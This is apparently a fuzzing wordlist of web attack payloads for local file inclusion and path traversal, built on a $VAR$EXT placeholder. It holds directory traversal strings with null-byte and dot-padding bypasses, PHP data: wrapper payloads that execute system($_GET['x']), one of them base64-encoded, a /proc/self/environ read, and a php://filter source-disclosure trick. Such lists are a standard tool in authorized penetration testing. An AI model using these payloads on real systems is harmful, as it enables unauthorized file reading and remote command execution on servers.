invalid../../../../../../../../../../$VAR$EXT/./././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././
../$VAR$EXT
../../$VAR$EXT
../../../$VAR$EXT
../../../../$VAR$EXT
../../../../../$VAR$EXT
../../../../../../$VAR$EXT
../../../../../../../$VAR$EXT
../../../../../../../../$VAR$EXT
../$VAR$EXT%00
../../$VAR$EXT%00
../../../$VAR$EXT%00
../../../../$VAR$EXT%00
../../../../../$VAR$EXT%00
../../../../../../$VAR$EXT%00
../../../../../../../$VAR$EXT%00
../../../../../../../../$VAR$EXT%00
/$VAR$EXT////
/$VAR$EXT////%00
../../../../../../../../../../../../../../../$VAR$EXT&...
invalid../../../../../../../../../../../../../../../$VAR$EXT&...
../../../../../../../../../../../../../../../$VAR$EXT%00&...
../../../../../../../../../../../../../../../$VAR$EXT/././&...
../../../../../../../../../../../../../../../$VAR$EXT/././&...
../../../../../../../../../$VAR$EXT.\.\.\.\.\.\.\.\.\.\.\ …
../../../../../../../../../$VAR$EXT……………. …
../../../../ […] ../../../../../$VAR$EXT
data:text/plain,<?system($_GET['x']);?>&x=ls
data:,<?system($_GET['x']);?>&x=ls
data:;base64,PD9zeXN0ZW0oJF9HRVRbJ3gnXSk7Pz4=&x=ls
../../../../proc/self/environ
php://filter/convert.base64-encode/resource=$VAR$EXT
